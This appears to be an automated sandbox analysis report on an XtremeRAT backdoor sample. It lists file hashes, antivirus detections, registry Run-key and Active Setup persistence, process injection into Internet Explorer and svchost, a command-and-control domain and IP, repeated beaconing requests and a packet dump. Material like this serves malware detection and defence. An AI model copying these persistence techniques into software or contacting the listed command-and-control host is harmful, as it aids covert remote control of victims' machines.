Analysis Date: 2014-02-01 11:19:28
MD5: 437af2c37a5e12a218baba4bbd4a2041
SHA1: a6048fcd8382f3346df64755567730ecf7e09b6f

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0: md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section UPX1: md5: 06ac2f3fe83b8d69ff1236b3db4381ec sha1: 30941ef6188472785161c238453043a34c823455 size: 31744
Section .rsrc: md5: 2e28036fe3536e928ef08fe55b4e0398 sha1: 8d0265e905cf1c3fbcb2bb02092b1eca99eb94a0 size: 1024
Timestamp: 1992-06-19 22:22:17
Packer: UPX 2.90 (LZMA)
PEhash: 274a5598a154af320a59c6eff0e011e5d713e611
AV avg: Cryptic.CWS
AV clamav: Trojan.Agent-272886
AV avira: BDS/Backdoor.Gen5
AV msse: Backdoor:Win32/Xtrat.A
AV mcafee: BackDoor-FAJ

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\XtremeRAT\Mutex ➝ siTJx5Lf
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates Process: svchost.exe
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe
Creates Mutex: siTJx5LfPERSIST
Creates Mutex: siTJx5Lf

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝ C:\WINDOWS\system32\InstallDir\xtreme.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\siTJx5Lf\ServerStarted ➝ 01/02/2014 09:38:44
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{SG04BNHW-A4XL-56ES-6K8K-3QQ100426L4L}\StubPath ➝ C:\WINDOWS\system32\InstallDir\xtreme.exe restart
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝ C:\WINDOWS\system32\InstallDir\xtreme.exe
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\WINDOWS\system32\InstallDir\xtreme.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\siTJx5Lf.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: siTJx5Lf
Winsock DNS: aa123.zapto.org

Process
↳ svchost.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝ C:\WINDOWS\system32\InstallDir\xtreme.exe
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{SG04BNHW-A4XL-56ES-6K8K-3QQ100426L4L}\StubPath ➝ C:\WINDOWS\system32\InstallDir\xtreme.exe
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝ C:\WINDOWS\system32\InstallDir\xtreme.exe
Creates Mutex: siTJx5LfPERSIST
Creates Mutex: siTJx5LfEXIT
Creates Mutex: siTJx5Lf

Network Details:

DNS: aa123.zapto.org
Type: A
188.121.242.73
HTTP GET: http://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://aa123.zapto.org:6622/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 188.121.242.73:6622
Flows TCP: 192.168.1.1:1033 ➝ 188.121.242.73:6622
Flows TCP: 192.168.1.1:1034 ➝ 188.121.242.73:6622
Flows TCP: 192.168.1.1:1035 ➝ 188.121.242.73:6622
Flows TCP: 192.168.1.1:1036 ➝ 188.121.242.73:6622
Flows TCP: 192.168.1.1:1037 ➝ 188.121.242.73:6622
Flows TCP: 192.168.1.1:1038 ➝ 188.121.242.73:6622
Flows TCP: 192.168.1.1:1039 ➝ 188.121.242.73:6622

Raw Pcap
0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   61613132 332e7a61 70746f2e 6f72673a   aa123.zapto.org:
0x000000c0 (00192)   36363232 0d0a436f 6e6e6563 74696f6e   6622..Connection
0x000000d0 (00208)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x000000e0 (00224)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000f0 (00240)   63616368 650d0a0d 0a                  cache....

Strings